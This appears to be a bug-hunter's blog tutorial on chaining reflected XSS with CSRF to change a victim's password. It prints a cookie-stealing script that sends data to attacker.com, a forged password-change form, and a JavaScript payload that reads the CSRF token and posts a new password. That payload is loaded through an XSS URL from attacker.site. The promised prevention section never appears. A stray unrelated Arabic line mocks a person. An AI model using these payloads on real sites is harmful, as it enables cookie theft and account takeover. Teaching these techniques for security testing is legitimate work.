Bypass CSRF protection with XSS.

عادل شكل الزعيم الأوحد لقطر ستة إلا تلت وقائد حلف الناحو

Hello friend, I’m ahmed, noob (penetration tester | bug hunter) & today I will take about escalate XSS to CSRF

Cross-Site Scripting (XSS) and Cross-Site Request Forgery (CSRF) are two common types of web application vulnerabilities that can have severe consequences for both the affected website and its users. In this article, we will explain how an attacker can escalate an XSS vulnerability to a CSRF attack, and how to prevent these types of attacks.

First, what is XSS :

XSS is a type of security vulnerability that allows an attacker to inject malicious code (usually JavaScript) into a web page viewed by other users. The injected code can be used to steal sensitive information, such as login credentials, or to perform actions on behalf of the victim, such as making a purchase or changing account settings.

For example, if a website allows users to post comments, but does not properly sanitize user input, an attacker could post a comment containing a malicious script, such as :

<script>document.location='http://attacker.com/steal.php?cookie='+document.cookie;</script>

When other users view the comment, the malicious script will execute, stealing the user’s cookies and sending them to the attacker’s server.

There are two types of XSS attacks: stored and reflected. Stored XSS attacks occur when the attacker is able to inject malicious code into a web page that is then permanently stored on the server and served to all users who visit the page. Reflected XSS attacks occur when the attacker injects malicious code into a web page, but the code is not permanently stored. Instead, the code is executed only when the victim visits the page.

Second, what is CSRF :

CSRF is a type of attack that allows an attacker to perform actions on behalf of a victim, without the victim’s knowledge or consent. This is done by tricking the victim into visiting a malicious website or clicking on a malicious link while they are logged into a vulnerable website. Once the victim visits the malicious website, the attacker can use the victim’s cookies and session information to perform actions on the vulnerable website, such as changing account settings or making a purchase.

For example, an attacker could create a malicious website that contains the following HTML code :

<form method="POST" action="http://vulnerable.com/changepassword">
<input type="hidden" name="newpassword" value="attackerpassword">
<input type="submit" value="Change Password">
</form>

When a victim visits the malicious website while logged into the vulnerable website, the form will be automatically submitted, changing the victim’s password to “attackerpassword”.

Now how can we combine the two vulnerabilitys together to get a high impact 🤑🤑🤑

A CSRF vulnerability can be used in conjunction with an XSS vulnerability to bypass the CSRF protection. In this type of attack, the attacker injects a malicious script into a web page that the victim visits. The script then sends a forged request to the web application with the victim’s cookies, allowing the attacker to perform actions on the victim’s behalf.

Here is an example of how this type of attack can be carried out :

The attacker finds an XSS vulnerability in a web application, which allows them to inject a malicious script into a web page viewed by the victim.The script creates a hidden form on the page with the necessary parameters for a sensitive action, such as changing the victim’s password. The script also sets the action of the form to a URL on the web application.The script then automatically submits the form, sending a forged request with the victim’s cookies to the web application. The request appears to be coming from the victim, and the server processes it without checking for a CSRF token.The attacker can then perform the sensitive action on the victim’s behalf, such as changing their password.

Malicious JavaScript payload that will update the victim's password to = hacked

document.addEventListener("DOMContentLoaded", function(){
const token = document.getElementById("token").value;

const xhr= new XMLHttpRequest();
//const params="token="+token+"&bio=Hacked!!!"
const params="token="+token+"&password=hacked"
xhr.addEventListener("load", ()=>{
alert("Your profile was hacked! Your password is changed to hacked!!");
location.href="profile.php";
})
xhr.open("POST", "profile.php", true)
xhr.setRequestHeader('Content-type', 'application/x-www-form-urlencoded')

xhr.send(params);

})

If we put that code inside the js file and put its in the xss src payload and the victim opens that url, his password will be changed to hacked and the alert with "Your profile was hacked! Your password is changed to hacked!!" Will pop up.

https://vulnerable.site/profile.php?msg=<script src=’https://attacker.site/attacker/script.js'></script>

The following js code is the one we kept the payload inside :

<script src='https://attacker.site/attacker/script.js'></script>